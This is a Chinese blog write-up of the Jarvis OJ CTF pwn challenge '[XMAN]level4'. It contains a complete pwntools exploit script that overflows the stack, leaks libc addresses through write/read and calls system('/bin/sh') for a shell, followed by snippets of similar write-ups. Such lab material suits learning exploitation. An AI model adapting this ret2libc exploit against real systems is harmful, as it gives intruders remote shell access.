[Jarvis OJ - PWN]——[XMAN]level4

最新推荐文章于 2023-05-27 16:59:01 发布
原创 最新推荐文章于 2023-05-27 16:59:01 发布 · 282 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何通过栈溢出漏洞来泄露内存中的地址,并利用这些信息找到`system`和`/bin/sh`的地址,从而实现代码执行。首先,通过计算缓冲区大小和偏移量,构造payload来触发栈溢出。然后,利用`write`函数泄露`read`的地址,通过`LibcSearcher`确定libc的基础地址。最后,再次构造payload,调用`system`执行`/bin/sh`,实现远程控制。

[Jarvis OJ - PWN]——[XMAN]level4

思路

0x100 - 0x88 = 120, 多余的空间足够我们进行栈溢出利用
但是我们没有system和’/bin/sh’地址。也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和’/bin/sh’地址。再返回main进行循环调用,第二次就可以直接控制返回到system。

exploit

from pwn import *
from LibcSearcher import *
p = process("./level4")
#gdb.attach(p, "b *0x0804846D")
elf = ELF("./level4")
write_plt = elf.plt['write']
read_got = elf.got['read']
main_addr = 0x08048470
payload = 'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4)

p.sendline(payload)
read_addr = u32(p.recv(4))
print hex(read_addr)
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump('read')
sys_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()
Jarvis OJ --level4
Kni9hT's Blog
11-11 336
level4level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
(Jarvis Oj)(Pwn) level4
Nothing
05-01 1225
(Jarvis Oj)(Pwn) level4 先看一下保护措施,没什么奇怪的地方。 这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所...
jarvisoj_level4
m0sway的博客
11-25 1048
jarvisoj_level4 使用checksec查看: NX,估计还是一道栈题目,拉进IDA中查看: 主函数中给出了漏洞函数,跟进查看: read()读取了0x100,buf变量距离ebp0x88,存在栈溢出。 程序没有system和/bin/sh,需要自己泄露libc去找,一道标准的ret2libc题目。 exp: from os import sendfile from pwn import * #start r = remote("node4.buuoj.cn",27632) # r =
XMAN-level4
weixin_30847271的博客
01-31 194
[XMAN] level4 首先checksec,信息如下 [*] '/root/Desktop/bin/pwn/xman-level4/level4' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: ...
jarvisoj——[XMAN]level4
王嘟嘟的博客
07-19 612
题目 Wp 检查基础项,有NX保护 ida看的时候还是之前的那种,但是没有给lib,需要自己去找 那么这里第一步,肯定是找到system的地址 第二步将/bin/sh写入bss字段 第三部调用即可
[Jarvis OJ - PWN]——[XMAN]level3_x64
Y_peak的博客
02-08 394
[Jarvis OJ - PWN]——[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再看看IDA,除了64位以外和[XMAN]level3一样 64位和32位的主要区别就是参数方面,64位当参数小于等于六的时候,是放在寄存器中,没有放在栈上。分别是rdi rsi rdx rcx r8 r9寄存器。所以我们需要找一些pop指令来将参数写入寄存器。 虽然没有找到pop rdx指令,但
[Jarvis OJ - PWN]——Typo(内涵peak小知识)
Y_peak的博客
02-17 443
[Jarvis OJ - PWN]——Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构。还是第一次遇到。 peak小知识 和x86架构不同, arm架构arm 下的函数调用规定, 函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令实现跳转; pc 寄存器相当于 x86 的 ei
[Jarvis OJ - PWN]——Test Your Memory
Y_peak的博客
02-16 325
[Jarvis OJ - PWN]——Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA exploit from pwn import * #p = process("./memory") p = remote("pwn2.jarvisoj.com",9876) context.log_level = 'debug' cat_flag_addr = 0x080487E0 sys_ad
[Jarvis OJ - PWN]——Tell Me Something
Y_peak的博客
02-02 379
[Jarvis OJ - PWN]——Tell Me Something 题目地址:https://www.jarvisoj.com/challenges 题目:
Jarvis OJ pwn——level1
CNS-Enterprise BCC-1701-J
05-27 237
Jarvis OJ 做题练习
18.9.20 Jarvis OJ PWN----[XMAN]level4
qq_42192672的博客
09-20 528
checksec之后,发现可以栈溢出 找可以溢出的地方 我们可以读取无穷无尽的数 但是在IDA中没找到system函数,同时题目也没有给我们lib文件,咋办………… 根据大佬的资料,了解到了pwntools的一个函数DynELF,DynELF函数可以leak system的真实地址,当然最后我们还是要用rop代码重新还原回去执行的 先看一下DynELF怎么用,基本流程如下 d ...
Jarvis OJ Level4
qq_39153421的博客
09-19 508
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
jarvis oj level4
发蝴蝶和大脑斧的博客
12-05 657
level3相比没有提供libc.so文件。学习使用Dynelf: def leak(address):
JarvisOJ level4
PLpa的博客
07-08 2475
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
xman level4//一步一步rop level2 writeup
u014281987的博客
08-29 946
这道题在没libc的情况下考泄露地址,两个方法,一个read之后直接pop三个栈参数再返回system,另一个重新返回vulnerable,只不过read(8字节),所以是send,不是sendline啊 另外一个大坑点在dynelf的使用,只能通过它泄漏偏移,然后用不带它的再写一遍,原理据师傅说是“DynELF是先算出bin的基地址,然后把符号表翻一遍,接着就知道libc的基地址了,然后把li
jarvisoj level4 wp ROP及DynELF模块
ditto的博客
12-31 620
拿到题目 开启了NX。 放IDA里: 栈溢出。 程序本身没有调用system函数 无法ret2plt。 且题目本身没有给出目标的动态库的版本。题目本身有write函数,可以泄露内存,则可以利用pwntools的DynELF模块,找到system函数。 本身程序段没有/bin/sh的字符串,则需要使用read函数将字符串读入,read函数有三个参数,这就需要pop pop pop ret这...
jarvis oj level4 wp
pppp974的博客
07-18 422
先简单看一下代码 很容易发现这是一个栈溢出,此题考虑使用DynELF来获取system函数的位置,然后使用read将’bin/sh’写入bss段之中,最后通过栈溢出进行调用。exp如下。 #!/usr/bin/env python from pwn import * elf = ELF('./level4') plt_write = elf.symbols['write'] plt_read...
jarvis oj level3/level4--多种解法实现ret2libc
超人学飞的日子
04-09 919
level3和level4都是ret2libc的典型题目,只不过level3给了libc文件而level4没有给。 这里以leve3为例,使用多种方式实现ret2libc 一,使用给定的libc文件,计算偏移地址 整体思路就是通过首先泄露处libc中某个函数运行时的实际地址,再通过给定的libc文件计算出system函数的实际地址,跳转到system函数执行 基础原理:http://ww...
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.youkuaiyun.com/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.youkuaiyun.com/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.youkuaiyun.com/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值